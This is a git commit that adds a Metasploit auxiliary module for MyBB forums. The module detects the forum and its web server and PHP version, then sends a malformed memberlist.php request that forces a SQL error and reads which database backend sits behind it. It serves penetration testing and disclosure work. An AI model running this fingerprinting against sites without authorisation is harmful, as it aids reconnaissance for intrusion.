Land #3190, @Karmanovskii's module to fingerprint MyBB database

2014-05-27 10:20:24 -05:00 · 2014-05-27 10:20:24 -05:00 · abe1d6ffc7
parent 704e4d78ca 86221de10e
commit abe1d6ffc7
1 changed files with 109 additions and 0 deletions
--- a/modules/auxiliary/gather/mybb_db_fingerprint.rb
+++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb
@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Determinant Databases MyBB ',
+      'Description' => %q{
+        This module checks if MyBB is running behind an URL. Also uses a malformed query to
+        force an error and fingerprint the backend database used by MyBB.
+      },
+      'Author'      =>
+        [
+          #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812
+          'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module
+        ],
+      'License'     => MSF_LICENSE,
+      'DisclosureDate' => 'Feb 13 2014'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum'])
+      ], self.class)
+  end
+
+  def check
+  begin
+    uri = normalize_uri(target_uri.path, 'index.php')
+    res = send_request_cgi(
+      {
+        'method'  => 'GET',
+        'uri'     => uri,
+        'vars_get' => {
+          'intcheck' => 1
+          }
+      })
+
+    if res.nil? || res.code != 200
+      return Exploit::CheckCode::Unknown
+    end
+
+    #Check PhP
+    php_version = res['X-Powered-By']
+    if php_version
+      php_version = "#{php_version}"
+    else
+      php_version = "PHP version unknown"
+    end
+
+    #Check Web-Server
+    web_server = res['Server']
+    if web_server
+      web_server = "#{web_server}"
+    else
+      web_server = "unknown web server"
+    end
+
+    #Check forum MyBB
+    if res.body.match("&#077;&#089;&#066;&#066;")
+      print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}")
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  rescue
+    return Exploit::CheckCode::Unknown
+  end
+
+  end
+
+
+  def run
+    print_status("#{peer} - Checking MyBB...")
+    unless check == Exploit::CheckCode::Detected
+      print_error("#{peer} - MyBB not found")
+      return
+    end
+
+    print_status("#{peer} - Checking database...")
+    uri = normalize_uri(target_uri.path, 'memberlist.php')
+    response = send_request_cgi(
+      {
+        'method'  => 'GET',
+        'uri'     => uri,
+        'vars_get' => {
+          'letter' => -1
+          }
+      })
+    if response.nil?
+      print_error("#{peer} - Timeout...")
+      return
+    end
+
+    #Resolve response
+    if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/)
+      print_good("#{peer} - Running PostgreSQL Database")
+    elsif response.body.match(/General error\: 1 no such function\: REGEXP/)
+      print_good("#{peer} - Running SQLite Database")
+    else
+      print_status("#{peer} - Running MySQL or unknown database")
+    end
+  end
+end